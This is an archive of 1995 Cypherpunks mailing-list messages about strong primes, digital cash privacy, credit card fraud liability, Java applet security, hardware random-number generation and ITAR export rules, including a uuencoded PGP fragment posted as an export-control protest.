On Tue, 14 Nov 1995, Eric Young wrote:

> Just for anyone interested, I 'found' a suspected 4096 strong prime (p and
> (p-1)/2 are prime) for use with Diffie-Hellman, generator of 2.

As a matter of interest, how long did it take you to generate this, and
with what hardware?  I left a 120Mhz Pentium searching for 15 hours
overnight without any success (it managed to eliminate 10 candidate primes
as not strong in that time). 


Regards,

- Andy

-----------------------------------------------------------------------
 Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585
 PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88
 All views expressed here are my own and not those of my employer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 17 Nov 1995 00:01:40 +0800
To: cypherpunks@toad.com
Subject: RSA-perl T-shirt
Message-ID: <199511161547.JAA13166@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


I've received several requests, and just want to let *everyone* know that
the T-shirt I have that scanned was from Joel. I must confess that I don't
know why it should make any difference, but.....

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 16 Nov 1995 23:08:31 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Anonymity and Intellectual Capital
In-Reply-To: <199511160148.RAA18908@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951116095111.27012I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


For an earlier treatment of a related subject, see my:
Anonymity and Its Enmities 
http://www.law.cornell.edu/jol/froomkin.htm

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 17 Nov 1995 02:32:00 +0800
To: EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <acd0ba0e02021004a15b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:18 PM 11/16/95, Robert Hettinga wrote:
>At 8:57 PM 11/15/95, E. ALLEN SMITH wrote:
>>-------------------
>>        I will as soon as someone comes up with a _fully_ private digital
>>cash system and starts using it for something. As I understand it, Chaum's
>>ecash system is not one (i.e., non-privacy to the sender and of amounts to the
>>bank). If I'm incorrect, please tell me and I'll set up an account with MTB
>>immediately (if there's a text-based interface).
>
>Ahhh. Next year in Jeresalem...
>
>Tell me, are you actually selling something on the net yet? How many
>customers do you have?

Bob, let me do a minor vent here.

You are critical of E. Allen Smith's viewpoint, and essentially question
whether he has anything to sell. Not much of an argument.

Especially when folks are urging that "people put their money where their
mouth is" and get MTB accounts.

Me, I don't plan to sign up for various reasons:

1. I'm not selling anything, and won't sign up just for "moral support." (I
tried this once before, getting an AMIX account early on, and that system
offered more of a chance for a 2-way market. Still, a waste of my time.)

2. I wish Mark Twain Bank well, but the success of the kinds of digital
cash we hope to see will not likely hinge on the success of one particular
operations, such as MTB.

3. The success of BankAmericard (later renamed Visa) came when real
customers and real shops started to use it, not when early pioneers set
themselves up as clearinghouses and whatnot.

I have more interesting things to do, personally, than to be a pioneer so I
can then have nothing to sell, and little to buy....when "interesting
markets" start to appear, I'll look at it again.

In any case, I wish all the pioneers well, and am happy to see Lucky
Green's involvement.

But when you urge people to be pioneers, and they express reservations or
doubts about the system, attacking their motives or implying they have
nothing to sell anyway is not too helpful.

Just my views, but, then, I don't have any customers either.

--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 23:48:43 +0800
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: e$: Financial Cryptography for Dogs, pt. 2.  OpenDoc Kitchen, anyone?
Message-ID: <v02120d03acd1082f811b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>That was at Apple in Cupertino, 11-13 NOVEMBER, not December.

The one I'm talking about *is* in fact in December, folks,

Please contact me if you want to come, folks!

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjnesser@asgaard.rocket.com (Philip Nesser)
Date: Fri, 17 Nov 1995 02:57:19 +0800
To: cypherpunks@toad.com
Subject: primality code
Message-ID: <9511161826.AA10763@asgaard.rocket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Can someone point me in the right direction for any archives of code to do
primality testing?  I would rather not have to right something from
scratch.


- --->  Phil

pjnesser@rocket.com
(206)885-5010x5477 (voice)
(206)882-5750      (fax)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKuBCjeDb3D8TcGFAQGHyAQAg8SXnZrIpQuWznlLxFS0uU0YM5mhwtXj
aG1qtts2vpOzbcNsIyV2zfx01yniOL5E7JycbQWUXJPmN0hRNxCovLWBL2rRJyrQ
KqdVUmaOa7RQqtW/Zx7qyCF3jPG0UZJe4KAJg6InwK6Ts3MS9e57Ft0T5iQG6Ygd
pb1f7+aiEE0=
=NYh0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: charles@europages.com
Date: Thu, 16 Nov 1995 20:56:54 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <9511161032.AA10705@europages.com>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 17 Nov 1995 03:42:02 +0800
To: Arley Carter <ac@hawk.twinds.com>
Subject: Re: credit card conventional wisdom
In-Reply-To: <Pine.HPP.3.91.951115165438.20268D-100000@hawk.twinds.com>
Message-ID: <199511161848.KAA06931@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>  I was attacking the line of thought
>> that goes, "credit card security is already marginal, therefore why 
>> should anyone try to improve it in cyberspace"? this is circular
>> reasoning. "why should anyone try to make something more secure when
>> it is already insecure?"
>> 
>In my post I am looking at this from an economics point of view. Simply
>put: If there is unlimited liability to the credit card holder because
>Mallet is stealing card numbers from the telco switch, encyrpted, plain text,
>it doesn't matter, there will no users.  If there are no users then
>there will be no transaction fees generated, no transaction fees, then it
>won't be deployed.  Therefore, there is no reason to develop the code 
>or even read the latest and greatest specs. and we are all wasting out 
>time.  

I don't believe legal liability is the issue. many businesses operate
despite the fact that they have large liability for what they perform.
the issue is balancing the cost they are guaranteed through their
charges with the liability they face. you are incorrect in thinking that
individual credit card users buy credit cards based on the
liability to themselves, from my point of view. individuals, even
if they are theoretically liable for large fraud costs, simply are not 
going to be able to be held accountable for them.

you seem to be saying that if credit card companies one day guaranteed
they would be responsible for all fraud charges, we would have cybercash
*now*. but credit card companies already do largely have to absorb the
costs of fraud. they are *already* liable. and again, I don't think you
will find the market really cares about liability prior to using 
the service. the individual generally
assumes they are not personally responsible for fraud in the card, and
the companies generally have to adhere to this paradigm.

what if tomorrow a new credit card company started up saying, "we are
not responsible for fraud. all fraud is the responsibility of the 
customer?"  they would be laughed off the planet. such a plan is not
even feasible. the consumer will simply cancel the credit card if they
perceive they are being charged for fraud, and not pay the company 
insisting they are not liable (despite whatever agreement they signed).

>We must recognize that no matter what code we write, how secure it is,
>it won't be used until the banks that must clear the transactions
>agree to accept the risks of loss in return for their transactions fees.

but this has *always* been the case. how is it not the case now? *all*
banks are liable for the security of their schemes. why do you think they
are not? why do you think they care so much about security?

>I haven't seen this from any of this consortiums and would like besides 
>publishing their specs for the best system agree that this risk bearing
>is a necessary step for electronic commerce to become a reality.

why do you think that nobody does not already realize this? isn't it
patently obvious to anyone who starts such a system?

>I would like to see members of the MasterCard and Visa coalitions comment 
>on this aspect of the systems that are promulgating.  The one who cracks
>this nut first without losing their shirt to Mallet will be the winner. The
>others that expect us to deploy systems based upon if Mallet breaks the 
>system, the cardholder and or merchant pays is wasting our time. 

who is proposing that consumers or merchants pay if a system is broken?
why do you think that this is the case? what is more likely is that
these fraud costs will be hidden in transaction charges, just like
they are with current credit cards. the individual consumers and merchants
will then be given the "illusion" that they are not paying for fraud,
but this cost is actually invisibly included in their "transaction
tax".

for the above reasons I don't at all understand why you insist that acceptance 
of liability is the problem delaying introduction of digital cash standards.

but one distinction I do realize has to be made in all this is the
difference between "fraud" and "breaking a system". the latter is
a far more potentially serious problem with cryptographic security than
the former. in fact cryptographic security attempts to deal with all
fraud by making "breaking the system" impossible, and succeeds to the
degree it accomplishes this.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 17 Nov 1995 04:39:59 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: credit card conventional wisdom (fwd)
In-Reply-To: <Pine.SOL.3.91.951115184015.18971A-100000@chivalry>
Message-ID: <199511161923.LAA10460@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Card Imprints taken with no online authorisation are typically charged a 
>transaction fee of 3-6%: with authorisation, 1.5-3%.  ATM card 
>transactions  are charged at around $0.10 per transaction.

are you saying that a typical mail order credit card transaction has
a 3-6% charge, because the card is not physically present?

this is a rather shockingly high rate.

again, what I have been calling the "fraud tax"-- it's hidden in every
purchase we make, and when we increase credit card security it will
increasingly be dissipated. but the problem is that no one realizes
this in general, and will argue, "why should we do anything to prevent
fraud? we are already not paying for it right now, why should credit
card companies spend any money to prevent it?"

BZZZZZZZT

I suspect these invisible fraud taxes are quite significant in general
and someone could really become very wealthy by inventing a system that
decreased them.

you might increasingly see retailers offer a "safe card discount"--
some brand of credit card charges them less transaction overhead, and
they pass these savings onto the customer.

or, the credit card company could send the money back to you like 
Discover does.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net (John Pettitt)>
Date: Fri, 17 Nov 1995 04:56:22 +0800
To: "Vladimir Z. Nuri" <ac@hawk.twinds.com>
Subject: Re: credit card conventional wisdom
Message-ID: <199511161930.LAA20815@software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:48 AM 11/16/95 -0800, Vladimir Z. Nuri wrote:
>
        ... about credit card liability

Hmmm, a few words about credit card liabilty.

The situation now is that in a "card not present" transaction the merchant is
liable for the fraud.  This means that *a lot* of internet based stores are 
getting eaten alive by fraud.  The big issue right now is not cards being
stolen from the telco switch (yes it's a risk but can anybody cite it
happening?).
The issue is authentication of the card user.  We have a significant
investment in 
AI / credit scoring code to defeat the wannabe crackers.  This goes way beyond
mod 10 checks and address verification.

[ as an aside I've put two people in jail this year for card fraud ]

John
John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Thu, 16 Nov 1995 09:05:50 +0800
To: hallam@w3.org
Subject: Re: credit card conventional wisdom
In-Reply-To: <9511151659.AA03934@zorch.w3.org>
Message-ID: <9511160031.AA41675@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

  >No. What Phil is saying is that the magnetic strip contains an extra 
  >group of digits which are only available when the stripe is read, and not 
  >when the card is used for CNP. 

  The extra gigits I was refering to are the ones on the front of the card 
  but not embossed.

Wow, you learn something every day. I've never in
my whole life (well, my American Express life,
over 15 years) noticed those four digits. I've
never been asked for them by anyone, or noticed
them being written down, either. Exactly when and
how are they used?

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMKqGSaRQkCwJ0+ZNAQEjlQQAuC4eQWHqvQCy8f07W8F7cQtTkvjq3uya
s2dx3aTyRRNd/pdS3AgdK58asxJPb59xGKj/2PP/7lWahC1ghDxmHv380V5DuRNq
VREIsMjxcmk/X/1NxjN5nGza1imvwj8DlQ8jEuPgk5mNkcyIiyhRuNmQnYdcJkbR
nGb91Eg/+Ss=
=27gx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Fri, 17 Nov 1995 05:04:49 +0800
To: cypherpunks@toad.com
Subject: Java & Netscape security (reply to misc. postings)
Message-ID: <199511161933.LAA18504@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Harry & Perry & Jeff & Dr Cohen & "Alice" -

1.  Netscape security: 

Like Jeff said, Netscape 2.0beta has all the same security features as
JDK beta.  (JDK = Java Developer's Kit, the name for our current
product.)  Netscape and Sun have been cooperating closely to
implement, and test, and document the applet security model.  The
applet security manager and the applet class loader are implemented at
the Java layer, for which source code is available from Sun.

Granted, some elements of the the applet security model are
implemented at the Java<-->runtime level, and that's why we have tests
that we run on the appletviewer and on Netscape Navigator.

2.  Corporate security class: 

  Harry asks: 

  | My question is, can a corporate user replace the security class in
  | Netscape. I understand that all the class libs are in an external
  | file. While a virus might exploit this... my reason for asking is for
  | corporate developers who are building "intra"net systems.. making some
  | tweaks to the security class would give them the flexibility they need.
  | Otherwise we have taken much of the fun out of Java. (for good
  | reasons).

The best thing to do if you want to implement your own
intra-corporation security model in the short run is to get a copy of
the beta source code, and take a look at AppletSecurity.java and
AppletClassLoader.java.  You can substitute your own versions of those
for your inhouse use.  This is relatively easy to do with the
appletviewer, and although it's possible to do some binary hack on
moz2_0.car and replace certain files with your own, it's probably not
everyone's cup of tea.  I mean, there's a difference between what you
can do, and what you want to do ... I understand that!

For the next release, we are working on how to enable people to
accomplish what you want to accomplish, in a standard way and in a
usable way, which preserves the applet security model.  The goal is to
design the APIs so that applets can have access to more system
functionality in a secure way.  Presumably what you really want to do
is write applets that have access to file i/o (or what have you), not
re-implement the security manager.


3.  Postscript considered dangerous:   (insert-smiley) 

As for the question of someone invoking a postscript interpreter via a
browser and thus opening up their system to some rogue postscript
file: I think it would be great if either of these two things were to
magically happen:

	1) people would stop putting postscript docs on web pages
	because it's the wrong technology for WWW - it wastes
	bandwidth - it's hard to view & hence often ugly - everyone
	just prints it out anyway and then complains because there
	is no one "standard" implementation of postscript printing
	worldwide and there are dozens of minor problems

	2) someone could implement a secure postscript previewer
	(whatever that means!) 

I doubt either of those two things will happen.  The average Jo on the
internet needs to understand that when s/he downloads binary files
over the internet and run them from insecure programs on their local
computer, well, s/he runs some risk.  This risk might be tiny, but
it's impossible to quantify loss.  If I lose a poem that I'm writing,
to me that's priceless, so I do not intend to imply that loss of data
isn't tragic for the person who loses it.  If you have data you can't
bear to lose, be sure to practice safe computing.  Perform backups
regularly, and use judgement about which interpreters and executable
programs you allow to run on your PC.

Marianne

--
internet fan, mrm@netcom.com
Java Products Group, mrm@eng.sun.com  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Fri, 17 Nov 1995 08:46:45 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Java & Netscape security (reply to misc. postings)
In-Reply-To: <9511162108.AA08466@all.net>
Message-ID: <199511162123.NAA06232@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Dr Cohen -

I work for Sun, and I don't speak for Netscape!     I do my best
to post messages that are accurate and that can be substantiated,
but that is not the same as being an official spokesperson. 

I think reasonable people can disagree on the dangers of
postscript interpreters.  I do not dismiss your concerns - I was
 merely pointing out that the fix may be simply not to run a postscript
interpreter.  That decision is made by a user, not by a web browser. 

Marianne
Java Products Group  (this is the name of teh Java group at Sun)
Sun Microsystems, Inc. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Thu, 16 Nov 1995 10:44:52 +0800
To: cypherpunks@toad.com
Subject: Amex cards extra four digits
In-Reply-To: <9511160031.AA41675@paganini.sydney.sterling.com>
Message-ID: <9511160227.AA09304@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Oops, following up my own posting, it proves I
should have been more careful...

I wrote
  Wow, you learn something every day. I've never in
  my whole life (well, my American Express life,
  over 15 years) noticed those four digits. I've
  never been asked for them by anyone, or noticed
  them being written down, either. Exactly when and
  how are they used?

But when I reread it I thought it sounded
sarcastic. It isn't -- there really are an extra
four digits printed on both my Amex cards that I'd
never noticed before -- and my question is
serious.

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMKqhTaRQkCwJ0+ZNAQGchQQAsmID1hHpIxJzjeXpkrrNxW4IWVoQwyel
2xb5VAoam37CPLj7ic5M+TqRh+FTBEwWItr3Uv18isv3+dYC7fKCvE7YCMBvENeO
xHzuNqoPiHCUnBUbFRP4U8/RO/GGdiPOo6ZlOnzOOmdzD2yDsWfPx6t6x0bVsFN+
63G/e6EgXzs=
=Xzwz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 17 Nov 1995 03:34:41 +0800
To: pmonta@qualcomm.com
Subject: Re: Hardware-random-bits interface
In-Reply-To: <199511152205.OAA27271@comsec.com>
Message-ID: <9511161835.AA00247@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Tue, 14 Nov 1995 14:31:46 -0800
>From: Peter Monta <pmonta@qualcomm.com>

>A rate of 300 kB/s will make a 600 MB one-time pad in an hour
>(assuming software is similarly fast).  I'm wondering if any
>of the mail systems have convenient hooks to use pads (though
>it would not be difficult to write up).
>
>Suggestions welcome.  I'll put the design on the Web
>once it's finished; replicating it should be pretty easy.
>People can also grab the device driver if they wish.

I'd be nervous about using a radio receiver which can be fed with a signal
by the adversary.  A noisy resistor or diode should be less subject to bias
by an active opponent.

Whatever you use for a source of bits, it should be carefully measured to
determine how much real entropy is in the source.  Don't assume all the
bits you get are independent, flat distribution bits.

You might need to hash bits down until you get independence.  You also
might want to provide some further ranno conditioning.

	cf. http://www.clark.net/pub/cme/P1363/ranno.html  (on ranno theory)
	and http://www.clark.net/pub/cme/html/ranno.html   (on conditioning)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Thu, 16 Nov 1995 11:06:56 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: credit card conventional wisdom (fwd)
In-Reply-To: <Pine.SOL.3.91.951115182044.18955B-100000@chivalry>
Message-ID: <9511160242.AA41564@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

  The printed digits above the embossed account number are the first four
  digits of the BIN (on Visa cards) or ICA (on MasterCards). They are there
  to discourage re-embossing of the card with another account number.

True for Visa cards, but false for the AMEX. On my
two Amex cards there is no obvious relationship
between the four digit number and the embossed
card number.

Greg.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMKqlKqRQkCwJ0+ZNAQEN5wP/Y1mwOl9/4nctt3M82d0Dy7B3u11+7PLF
eU7qTVh+Xe19SN1U+uzvpK6SU24zUfbAcLd6gMrxueNX5mD9u3dx8DhsQzL7w0Az
GcB9iHISV+WNN+7sIb2n3D6Me5Eo2cXoGQGAfNaCoqKAJmWLzJeFeL/lTKxUS0fs
NvZUtOexzOI=
=yB0t
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 18 Nov 1995 09:22:37 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511161933.LAA18504@netcom20.netcom.com>
Message-ID: <30ABB66D.3492@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:

[ quoted comments from mrm@netcom.com (Marianne Mueller) removed ]

> It seems clear from this that Netscape, or at least Marianne who seems
> to speak for Netscpe, doesn't understand the protection issues that my
> clients face.  I will nevertheless forward this official Netscape line
> to them so they can better understand why I tell them it is insecure.

  Ahem.  mrm@netcom.com is not a Netscape employee.  netcom.com is not
the same as netscape.com.  Marianne is a Sun employee, who is working
on Java.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 17 Nov 1995 05:49:43 +0800
To: tcmay@got.net
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <01HXPQLC7L688WY0D1@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Incidentally, I would like to apologize if I am going over (and not
contributing anything new to) discussion that has already taken place. If
anyone has or knows of an archive of the earlier list messages on the subject
(before I subscribed), I would like to read over them.

From: tcmay@got.net at 16-NOV-1995 13:00:29.05:

At 12:18 PM 11/16/95, Robert Hettinga wrote:
>
>Ahhh. Next year in Jeresalem...
-----------
        Although I am unfortunately not completely familiar with this phrase,
I believe that your meaning here may be that I may be too much of an idealist. 
My position is that I will not use a digital cash system with the significant 
deficits in privacy that the ecash system has. The only exception to this
stance would be if it becomes plain that it is the only alternative to a
credit card system.
        Admittedly, as has been pointed out to me in private email, some
degree of increased privacy in the ecash system can be gotten via
changing currencies using ecash. An example would be dollars to yen
through one changer and back again through another. However, I will not
regard a digital cash system as truly good until it has the following
traits:
        A. Private to any combination except all three of bank, sender, and
receiver.
        B. The bank does not know the amount transacted or owned, unless it
is the sender or receiver. (Obviously, it will know the total amount of
digital cash of its issuance in existence, and how much it has received from
or sent to each person, but it should not need to know anything more).
        C. Double spending is detectable, but does not reveal the identity
of the individual. Thus, the bank does not need to know the identity of
the individual when issuing the digital cash.

        The following are desirable but not strictly neccessary
characteristics:
        A. Offline transactions are possible. To detect double spending, a
transaction with the bank will probably be necessary, but this should
ideally be postponable until the goods purchased are shipped.
        B. Mathematical as opposed to computational authentication and
privacy. Since I am neither a mathematician nor a programmer, I am
uncertain about whether this last is possible. I have my doubts.
--------------

>Tell me, are you actually selling something on the net yet? How many
>customers do you have?
--------------
        If A. such a system as the above were set up and B. I had available
any computer programs, etcetera necessary to use it, then I would at
least _try_ selling something on the net. This something would be not
data itself, but true information- data with interpretations. I am
qualified to produce such a service in some areas in biology and
medicine. I am currently in a Ph.D. program in Molecular Genetics and
Microbiology, and my chief area of interest is gene therapy- I have thus
learned some things about human physiology. Perhaps more importantly than
my own knowledge and experience, I know who to ask and have such
individuals available. Admittedly, I would have to fit it into the time
between exams, or more likely between semesters.
--------------

Bob, let me do a minor vent here.

You are critical of E. Allen Smith's viewpoint, and essentially question
whether he has anything to sell. Not much of an argument.
---------------
        Thank you. (I would say "Thank you for your support," but my name is
neither Bartles (sp?) or James.)
---------------

Especially when folks are urging that "people put their money where their
mouth is" and get MTB accounts.

Me, I don't plan to sign up for various reasons:

1. I'm not selling anything, and won't sign up just for "moral support."
(I tried this once before, getting an AMIX account early on, and that
system offered more of a chance for a 2-way market. Still, a waste of my
time.)
---------------
        I tried signing up for AMIX also, but unfortunately came in too late
(after it closed down). I might consider signing up for a system with the
characteristics described above for "moral support," but I will not do so
for a system that I hope is replaced by a better one.

---------------
2. I wish Mark Twain Bank well, but the success of the kinds of digital
cash we hope to see will not likely hinge on the success of one
particular operations, such as MTB.

3. The success of BankAmericard (later renamed Visa) came when real
customers and real shops started to use it, not when early pioneers set
themselves up as clearinghouses and whatnot.
---------------
        Online commerce systems can be divided into four types, of
increasing level of desirability (and decreasing level of governmental
approval):
        A. Credit-card based systems such as credit card number encryption
and First Virtual.
        B. Partially privacy-protecting systems such as ecash.
        C. Fully privacy-protecting systems with the characteristics
described above, based on a governmental currency.
        D. Fully privacy-protecting systems with the characteristics
described above, based on a privately-produced currency and backed by the
issuer.
        I suspect that the first and second will have the most aboveground
chance of succeeding, given likely governmental interference in the third
and fourth; lack of public comprehension of all of the digital cash
systems and of privately-produced currency will impede some of them also.
However, the fourth may be a possibility for an "underground" currency
system, to be used among computer-literate individuals with an aversion
to government. I am currently creating an idea for a system of the fourth
type, and will put it on the exi-essay list when it is complete.
Incidentally, I suspect a privately-produced currency system may be
harder to regulate than a governmentally-produced currency system,
especially if the former is set up properly. I will explain further about
this idea in the aforementioned exi-essay system.
---------------

I have more interesting things to do, personally, than to be a pioneer so
I can then have nothing to sell, and little to buy....when "interesting
markets" start to appear, I'll look at it again.

In any case, I wish all the pioneers well, and am happy to see Lucky
Green's involvement.
---------------
        I also agree in wishing the "pioneers" well. The ecash system is
definitely preferable to one based on means such as credit cards.
        -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 17 Nov 1995 08:29:40 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <m0tFpbT-0008yaC@pacifier.com>
Message-ID: <199511162113.QAA08492@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes:
>>jim bell writes:
>>>>I think it's 121.1, Category XIII paragraph (b) item (5):
>>>>"Ancillary equipment specifically designed or modified for paragraphs (b)
>>>>(1), (2), (3), (4) and (5) of this category;"
>>>
>>>Question:  What makes computers in general NOT describable by such a
>>>paragraph?!?
>>
>>The referenced paragraphsdescribe cryptographic hardware, software and
>>technical data.  Computers in general are not "specifically designed"
>>as cryptographic equipment.
>
>Great!  Then you must merely ensure that there is at least one
>(non-encryption) program around that can use the same hooks.

The problem is that the non-encryption program must use the same
interface as the encryption program.  Text compression is often cited
as an example of a non-encryption program that can use the same hooks
as a compression program, but there's a key difference:  the text
compressor *doesn't* need a key.

The encryption tool would have an interface like
    Boolean (*)( DataSource, DataSink, void*);

A compressor written to the same interface would never need to touch
that third argument.  Therefore, the second argument is "specifically
designed" to permit an encryption tool to be used.

You'd need a program which not only *accepted* the additional parameter,
but also *needed* the second parameter.  I confess I have some difficulty
thinking of one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cassiel@alpha.c2.org (Cassiel)
Date: Fri, 17 Nov 1995 10:04:46 +0800
To: cypherpunks@toad.com
Subject: The Great FAQ Hunt
Message-ID: <199511162319.PAA24869@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Several fellow newbies have written me asking to share
the sources I received re: where to get the uncorrupted
Cypherpunk FAQ (Cyphernomicon).  You can get it uncompressed--
along with a lot of other cool stuff, like the Applied
Crypto book--at Pat Farrell's Web Site (thanks, Pat!)

http://www.isse.gmu.edu/~pfarrell/crypto.html

However, when I tried to summon up this 1.2 MB tome with 
Netscape, my computer choked.  Changing the cache settings
didn't seem to help, so I wound up downloading it via FTP
from

ftp.netcom.com /pub/tc/tcmay

